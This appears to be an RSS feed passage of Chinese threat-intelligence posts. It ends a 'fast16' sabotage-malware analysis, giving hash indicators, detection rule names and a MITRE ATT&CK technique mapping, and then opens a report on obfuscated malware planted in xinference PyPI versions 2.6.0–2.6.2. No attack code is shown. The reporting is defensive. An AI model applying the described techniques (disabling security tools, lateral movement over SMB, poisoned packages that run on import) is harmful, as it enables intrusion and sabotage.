leaf="">de584703c78a60a56028f9834086facd1401b355</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">92e9dcaf7249110047ef121b7586c81d4b8cb4e5</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">675cb83cec5f25ebbe8d9f90dea3d836fcb1c234</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">2fa28ef1c6744bdc2021abd4048eefc777dccf22</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">586edef41c3b3fba87bf0f0346c7e402f86fc11e</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">3ce5b358c2ddd116ac9582efbb38354809999cb5</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">650fc6b3e4f62ecdc1ec5728f36bb46ba0f74d05</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">d475ace24b9aedbf431efc68f9db32d5ae761bd</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">1ce1111702b765f5c4d09315ff1f0d914f7e5c70</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">ca665b59bc590292f94c23e04fa458f90d7b20c9</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">829f8be65dfe159d2b0dc7ee7a61a017acb54b7b</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">e6018cd482c012de8b69c64dc3165337bc121b86</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">145ef372c3e9c352eaaa53bb0893749163e49892</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">952ed694b60c34ba12df9d392269eae3a4f11be4</span></p></li><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf="">9e089a733fb2740c0e408b2a25d8f5a451584cf6</span></p></li></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">检测规则</span></h3><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">规则名称</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">用途</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">apt_fast16_carrier</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">检测fast16载体模块</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">apt_fast16_driver</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">检测fast16内核驱动</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">apt_fast16_patch</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">检测代码修补行为</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">clean_fast16_patchtarget</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">辅助规则</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK技战术映射</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">根据MITRE ATT&amp;CK框架，fast16框架涉及以下技战术：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">战术类别</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术编号</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1543.003</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">创建/修改Windows服务</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1547.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">引导执行或启动目录</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">权限提升</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1068</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用特权升级漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1562.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">禁用安全工具</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1027</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">混淆文件或信息</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">横向移动</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1210</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用远程服务漏洞</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">横向移动</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1021.002</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">SMB/Windows管理共享</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">影响</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1486</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">数据加密影响</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">影响</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T0834</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">通过物理破坏或Manipulation损坏</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结论与建议</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">fast16的发现为我们理解国家级网络攻击演进提供了宝贵的实物证据。该框架在2005年即已实现模块化设计、嵌入式Lua引擎、代码篡改攻击等高级能力，比同类技术的广泛应用提前至少五年。对于国内网络安全社区而言，这一发现的意义在于：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">历史价值</span></strong><span leaf="">：证实了高级网络攻击能力的演进并非线性过程，而是存在多个并行发展的高峰。2005年的攻击者已具备制造针对关键计算基础设施破坏工具的能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">战术预警</span></strong><span leaf="">：代码篡改攻击作为一种&#34;静默破坏&#34;手段，其威胁程度不亚于传统的勒索加密或数据外泄。国内高精度计算领域应建立相应的异常检测能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">技术储备</span></strong><span leaf="">：fast16的Lua VM架构与后续多个APT组织的技术传承关系，为我们提供了追踪APT组织演化脉络的重要线索。奇安信威胁情报中心将持续监控相关技术特征在新一代恶意软件中的重现。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">奇安信威胁情报中心呼吁，关键信息基础设施运营者应充分认识到供应链安全和代码完整性验证的重要性，建立覆盖开发、部署、运行全生命周期的安全管控机制。对于检测到相关特征的网络环境，应立即启动应急响应流程并与专业安全机构协作。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">参考来源</span></h2><ul style="overflow-wrap: break-word;list-style-type: disc;padding-left: 2em;margin-left: 0px;margin-top: 0.5em;margin-bottom: 0.5em;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" class="list-paddingleft-1"><li style="overflow-wrap: break-word;display: list-item;margin: 0.3em 0px;color: rgb(43, 48, 59);line-height: 1.6;word-break: break-all;hyphens: auto;"><p><span leaf=""><a href="https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/" target="_blank">https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/</a></span></p></li></ul><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="will-change: transform;box-sizing: border-box;"><div style="margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="gif" data-w="480" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100034894" src="https://wechat2rss.xlab.app/img-proxy/?k=cf30acce&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FodcL3w4qOq8Q0tyF9jS1mRFQkp2UDASGKVYIKDL7iaIZQrTvzAC5S2fVzo2VwMCkKeHCzpic6PIe3M9mTWwgdNcAcVfwpR0TJwKAg2hNVOT1I%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/portal">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9b9e0e3e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518546%26idx%3D2%26sn%3D971c24fad06958dad96bcd52816243ef">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 24 Apr 2026 11:56:00 +0800</pubDate>
    </item>
    <item>
      <title>又又一起AI相关供应链事件：Xinference PyPI  (版本 2.6.0–2.6.2)供应链污染报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518509&amp;idx=1&amp;sn=bef0b7230e3d69d03629a6f6c6ee60bb</link>
      <description>广受欢迎的 Python 软件包 xinference (Xorbits Inference) 在 PyPI 上遭到污染，该包主要用于部署大语言模型 (LLM)、语音识别和多模态 AI 模型。恶意版本 2.6.0、2.6.1 和 2.6.2 。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-23 10:29</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=9b1febb5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicu2oDIDCNNdQbYoypZ79slkicgOdXCatlG4toPwFliamfqLsCX5t9icibt67vz1mqlL8snEA4KfcBhGNOdyadvTAdIzhxesKfgeX8%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>广受欢迎的 Python 软件包 xinference (Xorbits Inference) 在 PyPI 上遭到污染，该包主要用于部署大语言模型 (LLM)、语音识别和多模态 AI 模型。恶意版本 2.6.0、2.6.1 和 2.6.2 。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">执行摘要</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">广受欢迎的 Python 软件包 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">xinference</span></strong><span leaf=""> (Xorbits Inference) 在 PyPI 上遭到污染，该包主要用于部署大语言模型 (LLM)、语音识别和多模态 AI 模型。恶意版本 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">2.6.0、2.6.1 和 2.6.2</span></strong><span leaf=""> 被上传，其 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">__init__.py</span></code><span leaf=""> 文件中包含混淆的恶意软件，在执行 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">import xinference</span></code><span leaf="">（或启动 CLI/服务）时会立即触发执行。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, 